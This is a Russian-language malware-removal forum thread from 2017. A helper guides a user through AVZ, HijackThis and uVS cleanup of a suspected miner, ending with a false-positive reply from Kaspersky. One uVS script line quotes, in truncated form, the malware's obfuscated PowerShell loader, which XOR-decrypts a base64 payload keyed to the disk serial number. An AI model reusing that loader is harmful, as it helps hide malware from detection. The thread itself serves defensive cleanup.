Походу что-то осталось от майнера

[Mart1z]

avz показал много файлов, которых я ранее не видел и они обновляются каждый день, не уверен, что они системные.

Путь: ..\AppData\Local\Temp

Папки: _MEI87802 и _MEI93722

[Mark D. Pearlstone]

Порядок оформления запроса о помощи

[Mart1z]

@Mark D. Pearlstone,

Ничего не понял, я же прикрепил лог. Ясно, надо было нажать Загрузить, я думал оно загрузить после нажатия Отправить.

CollectionLog-2017.12.14-17.41.zip

[regist]

Здравствуйте!

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Program Files\Windows NT\Accessories\task.exe', '');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)
 
"Пофиксите" в HijackThis:

O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (file missing)
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup (file missing)
O22 - Task: (disabled) CAM - C:\Program Files (x86)\NZXT\CAM\CAM_V3.exe (file missing)
O22 - Task: (telemetry) \Microsoft\Office\Office 15 Subscription Heartbeat - C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (file missing)

 
 

WinZip 21.5 [20170910]-->MsiExec.exe /X{CD95F661-A5C4-44F5-A6AA-ECDD91C2410F}

деинсталийте.

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.
 
+ Скачайте AutorunsVTchecker, распакуйте и запустите. Не закрывайте окно до окончания завершения работы программы.

[Mart1z]

WinZip 21.5 [20170910]-->MsiExec.exe /X{CD95F661-A5C4-44F5-A6AA-ECDD91C2410F}деинсталийте.

Удалить? Как удалить?

https://virusinfo.info/virusdetector/report.php?md5=BC78BEFBE898976BAE9C95F3FDE24488

KLAN-7344322173

Пофиксил, с этим WinZip 21.5 [20170910]-->MsiExec.exe /X{CD95F661-A5C4-44F5-A6AA-ECDD91C2410F} не понял что делать.

 

AutorunsVTchecker запускал.

CollectionLog-2017.12.14-20.24.zip

[regist]

 

 

Удалить? Как удалить?

через установку и удаление программ.

 

 

 

- Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com Полученный ответ сообщите здесь (с указанием номера KLAN)

где ответ?

[Mart1z]

Благодарим за обращение в Антивирусную Лабораторию

Присланные вами файлы были проверены в автоматическом режиме.

В антивирусных базах информация по присланным вами файлам отсутствует:
quarantine.zip

Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.

[regist]

1. Скачайте Universal Virus Sniffer (uVS)
2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
   
   !!!Внимание.
   Если у вас установлены архиваторы
   WinRAR
   или
   7-Zip
   , то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
   
   !!! Обратите внимание
   , что утилиты необходимо запускать от имени Администратора. По умолчанию в
   Windows XP
   так и есть. В
   Windows Vista
   и
   Windows 7
   администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать
   Запуск от имени Администратора
   , при необходимости укажите пароль администратора и нажмите
   "Да"
   .

   
   

 

[Mart1z]

Прикрепил.

BOX_2017-12-14_23-30-02.7z

[regist]

Скачайте Malwarebytes' Anti-Malware. Установите.
На вкладке "Параметры" - "Личный кабинет" ("Settings" - "My Account") нажмите кнопку "Деактивировать ознакомительную Premium-версию".
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
Самостоятельно ничего не удаляйте!!!
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
Подробнее читайте в руководстве.
 

+ Нажмите Win + R, введите powershell и нажимите ОК. Вставьте такую строку в окно и подтвердите клавишей ENTER:

gwmi win32_diskdrive | where {$_.DeviceID -eq '\\.\PHYSICALDRIVE0'} | select Model, Serialnumber >desktop\sn.txt

Файл sn.txt с рабочего стола прикрепите к вашему сообщению.

[Mart1z]

Прикрепил.

scan.txt

sn.txt

[regist]

1) MBAM деинсталируйте.

 

2)

1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
   

   ;uVS v4.0.10 [http://dsrt.dyndns.org]
   ;Target OS: NTv10.0
   v400c
   BREG
   deltmp
   zoo F:\STEAM\STEAMAPPS\COMMON\THIS WAR OF MINE\THIS WAR OF MINE V3.0-V3.0.3 PLUS 7 TRAINER.EXE
   ;---------command-block---------
   zoo %SystemDrive%\USERS\USER\APPDATA\LOCAL\TEMP\CHROME_BITS_8804_23662\28.0.0.126_WIN64_PEPPERFLASHPLAYER.CRX3
   delall %SystemDrive%\USERS\USER\APPDATA\LOCAL\TEMP\CHROME_BITS_8804_23662\28.0.0.126_WIN64_PEPPERFLASHPLAYER.CRX3
   delref "%SYSTEMDRIVE%\PROGRAM FILES\WINDOWS NT\ACCESSORIES\TASK.EXE" -COMMAND "FUNCTION DEC([BYTE[]]$CB, [STRING]$PASS){$PB = [SYSTEM.TEXT.ENCODING]::UTF8.GETBYTES($PASS);$S = $PB[0];$J=0;FOR($I = 0; $I -LT $CB.COUNT; $I++){IF($J -GE $PB.COUNT){$J=0} $S = (23 -BAND $S -BOR 152) -BXOR $S;$CB[$I] = $CB[$I] -BXOR $PB[$J] -BXOR $S;$J++}RETURN $CB;}$OBJ = GWMI WIN32_DISKDRIVE | WHERE {$_.DEVICEID -EQ '\\.\PHYSICALDRIVE0'} | SELECT MODEL, SERIALNUMBER;$D = DEC ([SYSTEM.CONVERT]::FROMBASE64STRING('V1IFHP0C9RPSQPQDVJVJQ6A7PUUREDTDJR7IIZFL6G6HPQMOLG6ZCZU26USKVS1AZGT+LFWYGFURTBXRPUUREC9YJR7IIBR+5NF3FE1GZE/ORDHP8L/BTMPNJZ7PI7PEWL/YJ/FSSUSGFCIPMQRIQOLH8HVMDO4IKBXRUMM
   bl 65D86C34814C02569E2AD53FD24E7F61 431616
   zoo %SystemDrive%\PROGRAM FILES\WINDOWS NT\ACCESSORIES\TASK.EXE
   delall %SystemDrive%\PROGRAM FILES\WINDOWS NT\ACCESSORIES\TASK.EXE
   delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE.DLL
   delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.5\PSMACHINE_64.DLL
   delref I:\AUTORUN0.EXE
   apply
   
   regt 28
   regt 29
   czoo
   restart

4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.
6. После выполнения скрипта зайдите в папку, где распакована утилита uVS найдите архив, имя которого соответствует дате и времени запуска скрипта с префиксом ZOO_ (например: ZOO_2013-06-30_22-04-27.7z)
   
   Если архив отсутствует, то
   заархивруйте папку ZOO
   с паролем
   virus
   .

7. Полученный архив отправьте по адресу newvirus@kaspersky.com
   Полученный ответ сообщите здесь (с указанием номера KLAN)

 

3) Сделайте свежие лог по правилам.
 

[Mart1z]

KLAN-7353442366

Благодарим за обращение в Антивирусную Лабораторию

Присланные вами файлы были проверены в автоматическом режиме.

В антивирусных базах информация по присланным вами файлам отсутствует:
28.0.0.126_WIN64_PEPPERFLASHPLAYER.CRX3.---.txt
TASK.EXE._21D5224E20A4BE7F303AB6C4B9F219D0D70904EE
TASK.EXE._21D5224E20A4BE7F303AB6C4B9F219D0D70904EE.txt
THIS WAR OF MINE V3.0-V3.0.3 PLUS 7 TRAINER.EXE._6E12A56E583E3F62483B578F7CC1FD4923FA0763.txt

В следующих файлах обнаружен вредоносный код, определяемый продуктами с включенной технологией KSN:
THIS WAR OF MINE V3.0-V3.0.3 PLUS 7 TRAINER.EXE._6E12A56E583E3F62483B578F7CC1FD4923FA0763 - UDS:DangerousObject.Multi.Generic

Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.
 

CollectionLog-2017.12.15-23.55.zip

[regist]

Что с проблемой?

 

 

 

В следующих файлах обнаружен вредоносный код, определяемый продуктами с включенной технологией KSN: THIS WAR OF MINE V3.0-V3.0.3 PLUS 7 TRAINER.EXE._6E12A56E583E3F62483B578F7CC1FD4923FA0763 - UDS:DangerousObject.Multi.Generic

Если не уверены в данном файле, то лучше его удалите. А если уверены, то отправьте через https://virusdesk.kaspersky.ru/ как ложное срабатывание. А если есть лицензия на касперского, то лучше через личный кабинет, тогда гарантированно получите ответ опасен или нет этот файл.

[Mart1z]

Anti-virus Lab replies to your request [VD3][FILE:2][LN:ru] [KLAN-7359392078]

Здравствуйте,

Это было ошибочное срабатывание.
Оно будет исправлено.
Благодарим Вас за помощь.

С уважением,
Рассохин Кирилл, Вирусный аналитик, АО "Лаборатория Касперского"